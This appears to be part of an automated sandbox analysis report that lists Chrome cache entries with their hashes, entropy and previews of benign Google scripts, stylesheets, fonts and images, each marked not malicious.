URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 218

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	5.249530958699059
Encrypted:	false
SSDEEP:	24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
MD5:	FBE36EB2EECF1B90451A3A72701E49D2
SHA1:	AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
SHA-256:	E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
SHA-512:	7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww

Chrome Cache Entry: 219

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2027)
Category:	downloaded
Size (bytes):	1157821
Entropy (8bit):	5.8039211960552395
Encrypted:	false
SSDEEP:	24576:rcetEIzyHqgf0VGJmmka3q7M4mHNrO7d2LhdfbIXdyDXCzOMDx9LstDJ0wh:rcetEIzyHqgf0VGJmmka3q7M4mHNrO7A
MD5:	22EB06D693E8544709EA9FBF7B176370
SHA1:	D1724252C6C50D16E91CF953AF997F9FEDF22220
SHA-256:	315B08DD1E3C4D51D046FBE7F7A5D497866E4E3230BC6F061EAF6556446EAC52
SHA-512:	29712BD15113ED0F22B02C72EB00D0B85E674A4E7952BD72625766FB05DDFA3E83D108897DF760DE0B87DBE2F32BED758621F0D50197EA2769D8C80547CFAFDD
Malicious:	false
Reputation:	low
URL:	https://www.google.com/logos/doodles/2024/popcorn/rc4/popcorn.js
Preview:	(function(){'use strict';var m,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");}var ca=ba(this);.function ea(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}function fa(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})}function q(a){return fa(a())}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});.ea("Object.values",function(a){return a?a:f

Chrome Cache Entry: 220

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1431)
Category:	downloaded
Size (bytes):	201635
Entropy (8bit):	5.475644599611849
Encrypted:	false
SSDEEP:	3072:BTBiAUO4TOeYoUwwy1xmV4rpV9O4z6WwsJxL4/EtqWceUgI:B2THYo11xmWrpMnsJxL4/4TceUgI
MD5:	52826249B832AE798CADA638B9BA6E3E
SHA1:	DDC6865A72806318C7F0AEC5E63F4446FE84D505
SHA-256:	A0ABCCED6A2814D1B9D139001A9FD88B7C7F0F539810711348F50029E86B3B5E
SHA-512:	D4E170FE1D48BFFB08FE13AB316538D273AE9BC425B984E3F8A53A1E8D1BB04FEE472DB14127F3106CD196A2BCAB5B2CC0819536EE1F10AB31A30FD589C07DDF
Malicious:	false
Reputation:	low
URL:	"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/am=IEAwYGw/d=1/excm=_b,_tp,calloutview/ed=1/dg=0/wt=2/ujg=1/rs=AM-SdHtgGiWdOmhyCST5m9Q52oIlUwlxzQ/m=_b,_tp"
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x20304020, 0x1b1, ]);./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT./.var ia,aaa,Ga,baa,Ja,cb,vb,Kb,Pb,Qb,Rb,Tb,Ub,Vb,Wb,Zb,eaa,faa,ac,cc,jc,mc,oc,gaa,uc,vc,wc,Cc,Jc,Kc,Nc,Pc,Rc,Tc,Oc,Yc,laa,ld,hd,md,maa,naa,wd,vd,oaa,zd,paa,Bd,qaa,Cd,raa,Jd,saa,Nd,Td,Ud,Wd,$d,ae,Zd,ce,ze,Ce,Ke,Ie,Le,z,Pe,Se,We,cf,zaa,yaa,Aaa,Baa,lf,Caa,Daa,Eaa,Faa,Gaa,Haa,Iaa,Kaa,Jaa,Maa,Naa,bg,fg,Taa,Raa,qg,wg,zg,Yaa,Zaa,Bg,Qg,cba,dba,Vg,eba,fba,gba,ih,jh,kh,hba,iba,nh,kba,lba,rh,sh,pba,rba,sba,tba,uba,vba,wba,xba,zba,Aba,Bba,Dba,Eba,aa,

Chrome Cache Entry: 221

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7408)
Category:	downloaded
Size (bytes):	507559
Entropy (8bit):	5.613139567857191
Encrypted:	false
SSDEEP:	6144:iW8dOE0XjKqPt2zB4ZvvhHNiNoMDQbLkdj/AJq:iK32l4ZvpHMnmLkZp
MD5:	1C2924254D36A4C4EBC68F58FF5E3622
SHA1:	8DEF848801CD910B28E7DD976D1465CCD8E62CC6
SHA-256:	822415B831E8F2E6D92111EABEA7610C0DC884253BD3122F45D41820F8896FFB
SHA-512:	526A544CCC6B41D46971F269A113E0954D75067F0D3282925F00D0BA49317AE647A67D4E09B522C02615CE0137FA22AD9F13E1AEB24BDC5372923D7F78ADA048
Malicious:	false
Reputation:	low
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3"
Preview:	_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli

Chrome Cache Entry: 222

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (593)
Category:	dropped
Size (bytes):	1671
Entropy (8bit):	5.290614524727893
Encrypted:	false
SSDEEP:	48:XrNKndOZYoLmuJiuX4NRJqBGbafGGbZA/G4k:xfbLm944N6fY/G3
MD5:	B6678CF8511C982AAFF6006FB9401CF5
SHA1:	38D1A09A409B96EA0EE5E8FCE75883AF0050DC89
SHA-256:	B247AC02EFF5C347932B6888541FD0F494464E968F3400770DE01DD981214259
SHA-512:	C4634CF368CB10004DBBCBBC4E50DF463928FF39050112F27A5086904467BE0A20E5292EF82ACB488531968D4B3F6F8D8F5C367ADDC1DAD2802F632CA962A13A
Malicious:	false
Reputation:	low
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.w("lOO0Vd");._.Yab=new _.Nd(_.mLa);._.y();.}catch(e){_._DumpException(e)}.try{.var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this)};ibb=function(a){return Math.random()Math.min(a.PldMath.pow(a.plb,a.jcb),a.Ord)};_.jbb.prototype.Z2b=function(){return this.jcb};_.jbb.prototype.Tja=function(a){return this.jcb>=this.NEa?!1:a!=null?!!this.rEd[a]:!0};_.kbb=function(a){if(!a.Tja())throw Error("ye`"+a.NEa);++a.jcb;a.olb=ibb(a)};.}catch(e){_._DumpException(e)}.try{._.w("P6sQOc");.var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()1E3,a.mib(),d.ka()1E3,b)},mbb=!!(_.Kg[29]>>29&1);var nbb=function(a){_.Bn.call(this,a.Ma);this.logger=null;this.ka=a.service.gDb;this.ta=a.service.metadata;a=a.service.Abd;this.fetch=a.fetch.bind(a)};_.C(nbb,_.Bn);nbb.Ga=function(){return{service:{gDb:_.dbb,metadata:_.Yab,Ab

Chrome Cache Entry: 223

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 345 x 178, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	27042
Entropy (8bit):	7.974655468398463
Encrypted:	false
SSDEEP:	768:JjJLLgzgdrN1WTfHjxrAv/PNZY1W5Kbwht7D:bLUArWTfHF0nPN61W3htX
MD5:	FCE861C4DA61DA477B9A2123F38D8B6C
SHA1:	78B0436D4B5F7943BE7EE269CDB9EC6536E32CEF
SHA-256:	8666698DC6B89F1674AA43FB40EEEBD40F0461FB3946F8B98850D967CD2BAD1C
SHA-512:	2D52AA0B693AF2200BD5FF6C44E369B8BC69388A93EB66B67AA16838D80AC97A393F04BC170404D68B2424EEA56B875D04D15628562589B462280BE2C25D04DF
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...Y...........L.....PLTEGpL.<_.-,.?$. ,t.v...Z.o,.gtX.#5.].(2.)5.":. 9v ,q.=d$#_.BA.H:.C0.? ./_284.GV..).A#.E.%4Q.JI.K.$6..<..1..&.68.(2.+0.".%%.3,.h..z..F+.6#.a .........8...B#...N..R)./.i...M^...G.?&.U..^6Xe..[>w\A.`E..<3.. ...X(gK..A.."B.Z).YEI..<..w+..U..D..8..e...(..6.&.(.f+.s#.'.f#.. .s-.q?.oa......;g.........[..?.w9./.x*.8..>..D.4.-..G..W..C..=o?...(.2hK...Q..I....P.../..=..K.5.A.9-....6dQc.p..._.c/.......u9._,...\E.3....w.....k..k.....c...h(lT(E0.rR.hS...^..TlZx..L..(..5.M..o[.~=Q7....N9@......?...[EP'..MPtK`.<p.Fr...?........Iva.<.."`.(E.D5X.Z...A....d. J.?<q.Q...n..}j..U8B...p.r.Qv.V....Bm..^z.p..kq.j}.p.....y........~(..\|......u.....E...v!..........................y...........}..!F."K....q..+Q...._.."P...k.c........tRNS..Bb{q...>..................................................................................................................................................................................

Chrome Cache Entry: 224

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1689), with no line terminators
Category:	dropped
Size (bytes):	1689
Entropy (8bit):	5.640520027557763
Encrypted:	false
SSDEEP:	48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
MD5:	45DD7BD58C9F085DA52FA16A2A150066
SHA1:	9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
SHA-256:	0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
SHA-512:	520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
Malicious:	false
Reputation:	low
Preview:	.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;

Chrome Cache Entry: 225

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1431)
Category:	dropped
Size (bytes):	201635
Entropy (8bit):	5.475644599611849
Encrypted:	false
SSDEEP:	3072:BTBiAUO4TOeYoUwwy1xmV4rpV9O4z6WwsJxL4/EtqWceUgI:B2THYo11xmWrpMnsJxL4/4TceUgI
MD5:	52826249B832AE798CADA638B9BA6E3E
SHA1:	DDC6865A72806318C7F0AEC5E63F4446FE84D505
SHA-256:	A0ABCCED6A2814D1B9D139001A9FD88B7C7F0F539810711348F50029E86B3B5E
SHA-512:	D4E170FE1D48BFFB08FE13AB316538D273AE9BC425B984E3F8A53A1E8D1BB04FEE472DB14127F3106CD196A2BCAB5B2CC0819536EE1F10AB31A30FD589C07DDF
Malicious:	false
Reputation:	low
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x20304020, 0x1b1, ]);./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT./.var ia,aaa,Ga,baa,Ja,cb,vb,Kb,Pb,Qb,Rb,Tb,Ub,Vb,Wb,Zb,eaa,faa,ac,cc,jc,mc,oc,gaa,uc,vc,wc,Cc,Jc,Kc,Nc,Pc,Rc,Tc,Oc,Yc,laa,ld,hd,md,maa,naa,wd,vd,oaa,zd,paa,Bd,qaa,Cd,raa,Jd,saa,Nd,Td,Ud,Wd,$d,ae,Zd,ce,ze,Ce,Ke,Ie,Le,z,Pe,Se,We,cf,zaa,yaa,Aaa,Baa,lf,Caa,Daa,Eaa,Faa,Gaa,Haa,Iaa,Kaa,Jaa,Maa,Naa,bg,fg,Taa,Raa,qg,wg,zg,Yaa,Zaa,Bg,Qg,cba,dba,Vg,eba,fba,gba,ih,jh,kh,hba,iba,nh,kba,lba,rh,sh,pba,rba,sba,tba,uba,vba,wba,xba,zba,Aba,Bba,Dba,Eba,aa,

Chrome Cache Entry: 226

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2287)
Category:	downloaded
Size (bytes):	222005
Entropy (8bit):	5.525934675920663
Encrypted:	false
SSDEEP:	6144:DJ+6L9F/dcVoIqz3mnxXEzmnBBBpELq/N6p/kn6Z4vBk7SzCCdwDGslfjiCCc+Dp:9+6L9F/dYoIqz38xXJnBBBpELq/N6p/q
MD5:	6871D302C8E74C81AD6046E03E5BEA11
SHA1:	F20159BE94B5BFCFBC5C7679F361399F42328D29
SHA-256:	11456E3D960B97AF5ED7736ADE63019B6BECFC2491A5661171C3E53D2712DE75
SHA-512:	5A4EFF929DA69710F5EDA33CC2DB3C0677166A3B4AE7947909BEFAC8FED39EB33E4381814688DD0893CB44F28FF429E9711D7EB1DE0A2C3759EF36961764232A
Malicious:	false
Reputation:	low
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=qabr,q_d,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTv3Qzh6Ja6eSLzWU_FOQIMZM5uKUQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{.var Le;Le=0;_.Me=function(a){return Object.prototype.hasOwnProperty.call(a,_.Qb)&&a[_.Qb]\|\|(a[_.Qb]=++Le)};_.Ne=function(a){return _.Pb(a)&&a.nodeType==1};_.Oe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.Ie(a),a.appendChild(_.xe(a).createTextNode(String(b)))};var Pe;_.Qe=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""\|\|c==void 0?(Pe\|\|(Pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Ue;_.Te=function(a,b,c,d,e,f){if(_.uc&&e)return _.Re(a);if(e&&!d)re

Chrome Cache Entry: 227

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1572)
Category:	downloaded
Size (bytes):	12512
Entropy (8bit):	5.619911870702528
Encrypted:	false
SSDEEP:	192:jtK8WtK882tK8RQViXZkkJG/+NR8QBo2CbqGIwDBZKHqeBdz2EdK3PCdWp:I8Z8W8XJOqJcLx
MD5:	2CEC598F79693C0A54A0DFC29AF7C9D0
SHA1:	5EE5520913228699FD1A4CE700956FC73A3FFD13
SHA-256:	9D9BC2D67562F1DBB44E580C223779F4A8FD3F210D04447CDB3F45AC6984340A
SHA-512:	881B7AA67E7B69B92A615919921C8F9BE795DB5CC80E3DD458292E21E65C5F41A9253F02534F03B437C36F509A6F409D254D22991218CB346291651DDC30EFD1
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css?family=Fredoka:500%7CGoogle+Sans%7CGoogle+Sans+Text
Preview:	/. See: https://fonts.google.com/license/googlerestricted. /./ hebrew /.@font-face {. font-family: 'Fredoka';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8E-mKpNk.woff2) format('woff2');. unicode-range: U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;.}./ latin-ext /.@font-face {. font-family: 'Fredoka';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8H-mKpNk.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin */.@font-face {. font-family: 'Fredoka';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQa

Chrome Cache Entry: 228

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	dropped
Size (bytes):	660
Entropy (8bit):	7.7436458678149815
Encrypted:	false
SSDEEP:	12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
MD5:	C3DFF0D9F30EC0BCF4DEC9524505916B
SHA1:	4B378403ACBEBC3747E08C69B5FD7770A850C9EB
SHA-256:	73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
SHA-512:	677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^\|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.\|.z..(...:&m.V.C.'...D^.R....

Chrome Cache Entry: 229

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1518)
Category:	downloaded
Size (bytes):	269484
Entropy (8bit):	5.481173643062106
Encrypted:	false
SSDEEP:	3072:t5R+/rLk07byKtxMaQTdpJfb3N5PZ3BiS3Zw5oluv3sfaBOCtwHr1DFCx6:R+/XkkGKtQTdp1N/Bl34OuPQCOC+VFCM
MD5:	0B51953A796E17B4D9C4223E9D5AFBD6
SHA1:	014B3894888F2288222C1AC4698123CF32649FBC
SHA-256:	FA80771F7624B00C94526022A986CA657521400C5A9E7A32A09D2628F7DF2FCA
SHA-512:	AEA4CC24AD434A4D5F6917B604D23BCF10E258A062A73C6D07CA1204A548DCA5F6F666AF3B2AFE08CC2682AF35E2B581F15F868E429F32F924242F92979E7427
Malicious:	false
Reputation:	low
